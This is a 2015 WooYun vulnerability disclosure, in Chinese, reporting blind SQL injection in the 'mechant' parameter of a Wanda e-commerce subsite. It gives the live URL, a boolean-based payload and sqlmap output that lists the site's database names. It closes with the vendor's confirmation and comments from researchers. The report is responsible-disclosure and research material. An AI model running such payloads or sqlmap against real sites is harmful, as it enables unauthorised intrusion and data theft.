万达电商某分站注入

漏洞概要

缺陷编号:WooYun-2015-0104629

漏洞标题:万达电商某分站注入

相关厂商:万达电商

漏洞作者:greg.wu

提交时间:2015-03-30 09:47

公开时间:2015-05-14 09:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经确认,细节仅向厂商公开
2015-04-09: 细节向核心白帽子及相关领域专家公开
2015-04-19: 细节向普通白帽子公开
2015-04-29: 细节向实习白帽子公开
2015-05-14: 细节向公众公开

简要描述:

万达电商某分站注入

详细说明:

注入点:http://piao.ffan.com/good_list?mechant=2072413and 1=1mysql 数字型盲注很简单,直接跑一下sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: mechant (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: mechant=2072413) AND 3009=3009 AND (4082=4082---[21:07:40] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5[21:07:40] [INFO] fetching database names[21:07:40] [INFO] fetching number of databases[21:07:40] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[21:07:40] [INFO] retrieved: 3[21:07:41] [INFO] retrieved: information_schema[21:08:05] [INFO] retrieved: bp_goods[21:08:22] [INFO] retrieved: testavailable databases [3]:[*] bp_goods[*] information_schema[*] test

漏洞证明:

以上

修复方案:

过滤

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-3009:49

厂商回复:

感谢同学的关注与贡献!马上通知业务整改!

最新状态:

暂无

评价

  1. 2010-01-01 00:00 http://www.wooyun.org/corps/大连万达集团 白帽子 | Rank:0 漏洞数:0)

    请洞主私信留Q联系礼物事宜,谢谢!

  2. 2010-01-01 00:00 greg.wu 白帽子 | Rank:735 漏洞数:68)

    乌云的审核都是什么鬼!lijiejie的给走的是前台,到我这就走小厂商了!@疯狗 @xsser @浩天

  3. 2010-01-01 00:00 浩天 白帽子 | Rank:851 漏洞数:68)

    已首,rank晚点会更新,lijiejie的是主站,这个案例是子站

  4. 2010-01-01 00:00 greg.wu 白帽子 | Rank:735 漏洞数:68)

    @浩天 没事,我就发下牢骚。。。把我评论删了吧。。觉得自己过分了。。不好意思了各位。。。无视我把。。。

  5. 2010-01-01 00:00 爱上平顶山 白帽子 | Rank:2224 漏洞数:244)

    @浩天 咦~~ 我的呢~~

  6. 2010-01-01 00:00 qhwlpg 白帽子 | Rank:141 漏洞数:13)

    @浩天 还有我的~~